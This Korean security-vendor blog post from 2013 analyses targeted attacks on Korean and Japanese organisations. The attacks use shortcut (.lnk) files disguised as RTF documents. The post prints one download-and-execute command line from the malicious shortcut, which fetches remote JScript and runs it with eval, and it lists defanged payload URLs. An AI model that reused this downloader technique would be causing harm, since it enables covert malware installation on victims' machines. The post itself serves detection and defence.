분석 정보/악성코드 분석 정보

[주의]LNK 취약점 이용한 지능화된 표적공격용 악성파일 다수 발견

TACHYON & ISARC 2013. 8. 6. 16:03
1. 악성파일로 바로가기하는 LNK 공격 등장

잉카인터넷 대응팀은 2013년 07월 중순 경부터 08월 초까지 한국과 일본의 특정 기관들을 노린 것으로 보이는 은밀한 방식의 지능형 표적공격 정황을 다수 포착했다. 이 공격방식은 바로가기(.LNK) 파일형식으로 만들어져 있고, LNK 내부에삽입된 악의적 스크립트 코드명령에 의해 특정 사이트로 연결이 된다. 이 과정에서 이용자 몰래 EXE 악성파일을 추가로 다운로드하여 몰래 실행하는 일종의 원격실행 취약점이 작동하게 된다. 또한, 공격자들은 바로가기 파일이 마치 문서파일처럼 보이도록 하기 위해서 아이콘을 워드패드(RTF)로 위장하거나 실제 가짜 문서화면을 실행하여 이용자로 하여금 정상적인 문서파일로 인지하도록 현혹한다. 현재까지 한국과 일본을 상대로 한 공격 징후가 계속 발견되고 있는 상태이고, 대부분 바로가기 파일을 ZIP 등으로 압축하여 이메일에 첨부하는 유포기법을 이용하고 있다. 


실제 문서파일의 취약점 공격은 아니기 때문에 기존의 문서기반 악성파일 탐지정책을 우회하거나 회피하기 위한 용도로 교묘하게 이용되고 있으므로 각별한 주의가 요구된다. 해당 악성파일은 현재 이 시점까지 전 세계 대부분의 보안제품들이 탐지하지 못하고 있는 실정이며, 잉카인터넷 대응팀은 악성파일 변종들을 다수 확보하여 긴급 업데이트를 완료한상태이다. nProtect 제품군 이용자들은 최신버전으로 업데이트하면 [Exploit/W32.LNKER] 대표진단명으로 알려져 있는 변종들의 탐지 및 치료가 가능한 상태이다.

[2013년 08월 07일자 바이러스 토탈 진단현황] 

필요한 자료.rtf.lnk
https://www.virustotal.com/ko/file/0fa66b6e04ed1f72b784a8a841eac83febea3eacb61cc2b41bbbe54b02c0e606/analysis/

details.rtf.lnk
https://www.virustotal.com/ko/file/4f086b7a25a0de4f7ee55fd77e8b7cec04213a2573d076d812073fe4d5049f56/analysis/



※ 지능형 지속 위협의 주요 목적

1) 경제적, 정치적 및 전략적 이득 등을 취하기 위하여 주요 기관 및 기업의 중요 정보를 탈취 시도한다.
2) 표적 대상의 내부 네트워크 환경 등을 파악하고 점령 유지하며, 언제든지 제어가 가능하도록 구축한다.
3) 지속적으로 자신의 활동을 은폐시켜, 상당기간 동안 내부 정보를 수집하고 모니터링 한다.
4) 2차 공격 대상지로 하여금 공격자의 연쇄 공격이 신뢰될 수 있도록 보이기 위한 매개체로 악용한다.

[주의]통일연구 및 무역관련 기관을 겨냥한 표적공격 다수 발견
☞ http://erteam.nprotect.com/433

[정보]국내 유명 기업 표적 공격(APT)형 수법 공개
☞ http://erteam.nprotect.com/249

일본 국토교통부 산하 국토지리원 표적 공격형 악성파일 발견
http://erteam.nprotect.com/247

3월 10일 티벳(Tibet) 봉기 53주년 기념 표적형 공격 발견
http://erteam.nprotect.com/248


2. 악성파일 종류별 공격 사례


■ 사례 01


"필요한 자료.rtf.zip" 파일명으로 유포되었으며, 내부에 "필요한 자료.rtf.lnk" 이름의 악성파일이 포함되어 있고, 문서파일처럼 보이도록 하기 위해서 2중 확장자로 만들어져 있다. 압축을 해제하면 다음과 같이 LNK 확장명은 보여지지 않고, RTF 문서포맷처럼 보여진다.


"필요한 자료.rtf.lnk" 파일은 내부적으로 바로가기 대상 내용에 악의적인 스크립트 코드를 포함하여 두었기 때문에 특정 사이트로 연결되어 추가적인 스크립트 명령어가 실행되도록 만든다. 이 명령어는 임시폴더(Temp)에 "u.js" 라는 이름으로 생성되고 실행된다.


%ComSpec% "/c echo try{x=new ActiveXObject("MSXML2.XMLHTTP");x.Open("GET","http://***.***.**.**/js?k=**********************************",0);x.Send();eval(x.responseText);}catch(e){;}>%tmp%\u.js&%tmp%\u.js"


추가로 접속되는 사이트에는 또 다시 스크립트 명령이 작동되도록 만들어져 있고, 이 파일은 10진수 코드값으로 암호화되어 있으나 실제로 ASCII 코드값으로 변환되면 다음과 같이 특정 사이트에서 "application.rtf" 파일과 "config.exe" 파일을 다운로드하고 실행하는 명령어라는 점을 알 수 있다.


정상적인 문서파일이 실행된 것처럼 보이도록 하기 위해서 다운로드한 정상적인 "application.rtf" 문서 파일을 실행하여 보여준다.


하지만 사용자 컴퓨터에는 "config.exe" 라는 악성파일이 이용자 몰래 다운로드되고 실행된다.

■ 사례 02

 
"resume.zip" 파일명으로 마치 이력서 파일처럼 위장하여 유포된 경우이며, 압축파일 내부에는 "details.rtf.lnk" 파일이 존재한다. 이는 앞서 언급한 사례와 동일하게 2중 확장자와 RTF 문서파일처럼 위장하고 있으며, 특정 사이트로 접속을 시도하여 악의적인 스크립트를 실행하게 된다.

특히, 접속 사이트 도메인명에 KR 등 특정 키워드가 포함되어 있어 공격자의 표적 및 의도를 간접적으로 유추해 볼 수 있다.


"details.rtf.lnk" 악성파일이 실행되면 a.js 스크립트 파일에 의해서 특정 사이트에서 "explorer.exe" 와 "details.rtf" 파일이 다운로드되고 실행된다.

hxxp://krmofa.s****http.com/krorg/a.js
ㄴhxxp://krmofa.s****http.com/krorg/explorer.exe
ㄴhxxp://krmofa.s****http.com/krorg/details.rtf

 
이때 "details.rtf" 이름의 정상적인 문서파일이 실행되면서 다음과 같이 마치 정상적인 문서파일처럼 보여지도록 위장한다. 스크립트 명령어에 따라서 wordpad.exe 에 의해서 "details.rtf" 파일이 실행된다.


"explorer.exe" 악성파일은 임시경로(Temp)에 "iexplore.exe" 라는 이름으로 생성되고 실행되며, 다시 "All Users" 경로에 복사본을 "intel.exe" 파일명으로 생성하고 실행한다. 해당 악성파일은 아이콘이 투명하게 되어 있어 파일명만 보인다.

 
"intel.exe" 악성파일은 홍콩의 특정 호스트(C&C)로 접속하여 추가적인 명령을 수행하게 되며, 각종 개인정보 등이 외부로 노출될 수 있다.

 
■ 사례 03

앞서 설명한 대표사례의 경우들은 2013년 07월 25일과 31일에 제작된 것으로 모두 한국내 특정인을 겨냥한 표적형 공격기법이었다. 그러나 이번 사례는 2013년 07월 18일 제작된 것으로 일본 통신회사의 이용요금 정보와 법조계 모임 내용처럼 위장하여 전파된 경우이다.

이와관련하여 일본 KDDI 공식 웹 사이트에서는 공지사항을 통해서 요금안내로 사칭한 이메일을 주의하라고 안내하고 있다.

http://www.kddi.com/news/important/20130726.html


일본 통신사 요금안내 파일로 사칭한 악성파일은 "KDDI料金のお知らせ.zip" 과 "「日本の司法を正す会」ご関係者各位.zip" 등의 파일명으로 유포되었으며, 파일명만 다른 동일한 압축파일이다.

* KDDI 料金のお知らせ = KDDI 요금안내
* 日本の司法を正す会」ご関係者各位 = 일본 사법을 바로 잡는 모임 준비 관계자들



한국을 겨냥한 방식과 동일하게 일본을 겨냥한 악성파일도 RTF 문서파일처럼 보이도록 2중 확장자를 사용하고 있으며, 접속을 시도하는 웹 사이트 형식이 사례 02와 매우 흡사하여 동일한 제작자나 조직의 공격으로 추정된다.
 


일본용으로 제작된 LNK 악성파일은 "a.js" 스크립트 파일을 통해서 추가적인 "explorer.exe" 파일과 정상적인 문서파일인 "details.rtf" 파일을 다운로드하고 실행하게 된다. 

hxxp://sermofa.s****pics.com/a.js
ㄴhxxp://sermofa.s****pics.com/news/explorer.exe

ㄴhxxp://sermofa.s****pics.com/news/details.rtf

 

이때 "details.rtf" 이름의 정상적인 문서파일이 실행되면서 다음과 같이 마치 정상적인 문서파일처럼 보여지도록 위장한다. 스크립트 명령어에 따라서 wordpad.exe 에 의해서 "details.rtf" 파일이 실행된다.

 
설치되고 실행되는 "explorer.exe" 악성파일은 기존 변종들과 대부분 동일하게 작동하며, 최종 설치되는 악성파일들은 언제든지 새로운 종류가 유포될 수 있으므로, 각별한 주의가 필요하다.

3. 마무리

LNK 취약점을 이용해서 마치 문서파일처럼 위장한 악성파일이 증가함에 따라 기업 관리자들의 각별한 주의가 요망된다. 변종 악성파일이 다수 전파되고 있으므로, 운영체제와 각종 응용프로그램은 항시 최신버전으로 유지하고 기본적인 보안수칙 준수가 필요하다. 더불어 의심스러운 이메일의 첨부파일은 가급적 열람하지 않도록 하여야 한다.

잉카인터넷 대응팀은 해당 악성파일에 대한 진단 및 치료를 추가완료한 상태이다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

http://avs.nprotect.com/